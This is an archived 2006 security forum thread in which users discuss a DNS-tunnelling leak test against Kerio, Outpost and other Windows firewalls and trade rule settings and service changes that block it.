DNS Tester - leaktest

Discussion in 'other firewalls' started by djg05, Sep 23, 2006.

Thread Status:
Not open for further replies.
  1. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    DNS Tester - leaktest for Kerio 2.1.5

    This is one test that fails under Kerio 2.1.5. If you disable the DNS rule then it fails so it should be possible to tighten it up. The only way I can see is to set a DNS rule for each program that is allowed access, but this seems over the top and there should be a simpler way to do it. Any suggestions please.

    Another thing is how relevant is this test to being a real threat?
     
    Last edited: Sep 25, 2006
  2. Rmus

    Rmus Exploit Analyst

    Joined:
    Mar 16, 2005
    Posts:
    3,943
    Location:
    California
    I did that a year or so ago, just to try it. It doesn't take much time to configure the rules.

    At the time, I was not aware of any other way, and haven't searched around other forums recently.

    I was not convinced it was a real threat, and when I cleaned house earlier this year, I went back to my original DNS rules.

    These leak tests simulate what would happen if such malware somehow got installed and was permitted to run. I'm confident that won't happen, so I don't worry about them.

    regards,

    -rich

    ________________________________________________________________
    "Talking About Security Can Lead To Anxiety, Panic, And Dread...
    Or Cool Assessments, Common Sense And Practical Planning..."
    --Bruce Schneier​
     
  3. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Re: DNS Tester - leaktest for Kerio 2.1.5


    Thanks

    It might not be a real threat but am interested if it could be made to resist this test. It seems that in Win 2k, Services.exe is the point of failure. Cannot find any way of restricting it to prevent the escape. I have set the outgoing address range to my DNS address, local ports are 1400 to 1600 and remote point 53.

    This is the first allowed rule and I put a block in underneath to stop anything else being allowed.
     
  4. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Think I might have found the answer.

    Saw here that disabling the DNS service in Windows and then setting the rules for each application will defeat it - but I could be wrong.
     
  5. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    Hello,

    Disabling the DNS service will prevent the leaktest from working, that's true, but keep in mind that a real trojan exploiting this weakness will start the service back, before using it.

    The best if you are worried by this issue, is to install a firewall handling the DNS call and prompting for it, even when the DNS service is enabled.
    Lastly I've tried Outpost V4.0 RC4 (still not final) and it handles it well, for instance.
    You could also monitor the service starts with an HIPS, and block it when it's the DNS client.

    Regards,
    gkweb.
     
  6. Tommy

    Tommy Registered Member

    Joined:
    Dec 24, 2002
    Posts:
    1,169
    Location:
    Buenos Aires - Munic
    Link for this test please. I want to check Jetico v2 against it.
     
  7. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
  8. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    Yes, good interception on OP part.(and clear/understandable warning)
     
  9. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    For additional restrictiveness, It must also make sense to ensure the dns ip(s) are correct as well, which could be the router's LAN ip or the isp's dns ip's?
     
  10. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Yes, but I use a layered approach and hopefully either PG or BOClean will stop it.
     
  11. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    I have always disabled the DNS client, and have the services monitored,.. but,.. I always place a rules (with alert) to block services(W2K) / svchost(XP) from making DNS lookups.
     
  12. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    @cprtech
    It's indeed a good pratice to restrict DNS communications to your ISP DNS servers IP. Unfortunately, crafted DNS requests can be made to send information to the attacker's DNS server. The way DNS works, the packet will be sent first to your ISP DNS server, which then will forward it to the attacker's server. IP restriction in this case doesn't help, but it is anyway a general good practice to follow.

    @djg05
    That's what I suggest when I said :
    When using a layered approach, you can prevent such DNS exploit by preventing the service to start, provided your HIPS can do this.

    Regards,
    gkweb.
     
  13. Climenole

    Climenole Look 'n' Stop Expert

    Joined:
    Jun 3, 2005
    Posts:
    1,640
    Hi :)

    Just one remark.

    The DNS requests are done by the applications not svchost.

    [And, talking about this, the DNS client service in W xp is totally useless ...]

    An example of DNS req. by an application is the DNS leaks with Tor (The onion router) and Firefox. Even with a rule allowing only Tor to access DNS in UDP on remote port 53, the application makes it's own DNS requests. I Found no parameters in the application to stop this. (Some early version of Firefox have an option in about:config to avoid this but now the parameter have no effect ...)

    The only way I found to stop DNS leaks was to block the UDP port 53 for each application I'm using with Tor (Firefox, Thunderbird, Chatzilla+Xulrunner, 40tude Dialog and so on).

    Hope this help.
    :)
     
  14. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    When the Windows "DNS Client" service is enabled, all the DNS requests are made by svchost.exe (WinXP). When it is disabled, every apps do it by itself indeed.

    Even when the DNS service is enabled, it may be possible for an app to bypass it and to do the DNS request itself (I don't know), but then lucky for you, any firewall will prompt you for this, it's not the issue.
    The issue is when an application with no network access at all can send data without being seen from your firewall, which only notices svchost.

    FireFox is not a leaktest nor a trojan fortunately :)

    Regards,
    gkweb.
     
  15. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Thanks for that Stem - I did not know about that so is now done.

    Is there any chance of setting up a sticky for suggested blocking rules or services stopped from a security point of view? I am sure there are many I and others are unaware of.
     
  16. Stem

    Stem Firewall Expert

    Joined:
    Oct 5, 2005
    Posts:
    4,948
    Location:
    UK
    There are sites that give this info, but I could make a post to show you the services I disable /blocking rules I put in place in my own setup, if you think this would help you. (you would want W2K setup, yes?)
     
  17. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    Thank you gkweb. Geez, that malware is sneaky :eek:
     
  18. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    That would be handy Stem, and yes for 2k, but I assume others would like to see some for XP as well.
     
  19. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    An example of Stem's advice with Outpost v4.
    Select SVCHOST (for WinXP, services.exe for Win2K) and add this rule :

    http://perso.orange.fr/jugesoftware/forum/op2.gif


    With the DNS service disabled, the rule is never triggered (each application individually is making the DNS request).
    As soon as I enable it, if I run Firefox, the following popup appears :

    http://perso.orange.fr/jugesoftware/forum/op1.gif

    A good way of being alerted if the service get activated in your back.

    @djg05
    It's not exactly what you are looking for, but you may find this link usefull :
    http://www.firewallleaktester.com/advices.htm

    Regards,
    gkweb.
     
  20. cprtech

    cprtech Registered Member

    Joined:
    Feb 26, 2006
    Posts:
    335
    Location:
    Canada
    Hi gkweb,

    isn't it better to set the action to "Ask", since blocking svchost prevents access to MS Updates site? This is at least in my case, unless there is a way around eliminating the requirement for svchost connecting to port 53 using MS Updates.
     
  21. djg05

    djg05 Registered Member

    Joined:
    Apr 6, 2005
    Posts:
    1,504
    Thanks for the link

    Re the rule. Perhaps you should also check it is near the top or there is nothing above it can slip out through assuming it is a top down f/w.
     
  22. gkweb

    gkweb Expert Firewall Tester

    Joined:
    Aug 29, 2003
    Posts:
    1,932
    Location:
    FRANCE, Rouen (76)
    About the Outpost rule example for svchost, indeed blocking it will block also MS updates. A tradeoff between security and usablity would be to uncheck the rule only when enabling automatic update for 1mn (time to check if there is available updates).

    The other possibility, is to uncheck the system global rules allowing DNS for every app, and to not add a DNS rule for svchost. Thus, as soon as svchost needs a DNS request, your firewall will display a popup (that you can choose to accept only if you do windows updates).

    Finally, the most secured, but also the less usable and user-friendly, is to remove the global DNS rules (as said above), to block svchost from doing DNS requests, and to manually update Windows with Internet Explorer and Windows Update website. Updating Windows this way does not require DNS access for svchost (or services.exe under Win2K). Of course do not forget to disable the "DNS client" service before doing this, or you will be unable to browse anything as svchost will try to do all DNS requests which will be blocked.
    You can even remove the HTTP and HTTPS rules if you choose this solution, you then will have to accept "once" every time you manually update your Windows. Just keep the DHCP rule if you need it.

    Regards,
    gkweb.
     
    Last edited: Sep 26, 2006
Thread Status:
Not open for further replies.